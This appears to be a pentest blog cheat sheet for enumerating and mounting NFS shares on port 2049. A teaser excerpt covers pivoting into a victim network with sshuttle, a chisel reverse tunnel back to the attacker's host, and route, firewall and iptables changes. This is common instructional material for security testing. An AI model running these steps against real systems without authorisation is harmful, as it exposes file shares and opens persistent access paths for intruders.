Skip to main content

NFS - Port 2049 Pentest

 

might be available via RPC -111 port as well.

#nmap 
nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse  10.10.10.10 -Pn

#Check if NFS is actually running or not; Update RPC process ID
rpcinfo -p 10.10.10.10
rpcinfo -n 2049 -t 10.10.10.10 100005

#List the available mountable shares
showmount -e 

#Mount a drive
mkdir /tmp/new
mount -t nfs  10.10.10.10:/ /tmp/new -o nolock -o vers=3

or

mount -t nfs4 -o proto=tcp,port=2049 10.10.10.10:/home /tmp/new/

Note: if requested NFS version or transport protocol is not supported, change the version (-o vers=3) or (-o vers=2) or totally remove the version and let it take the version. 
you can also add -o rw,vers=3 



Comments

Popular posts from this blog

Pivoting into an internal network behind firewall

    Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 or ./chisel server --port 9001 -reverse #On Victim ./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks .\chisel.exe client 10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #If the above doesnt work #asuming Kali and windows are on Eht0 #add a firewall rule to allow Kali ip traffic netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP #on Kali - Allow tun0 traffic to forward on iptables sudo iptables -P FORWARD ACCEPT ...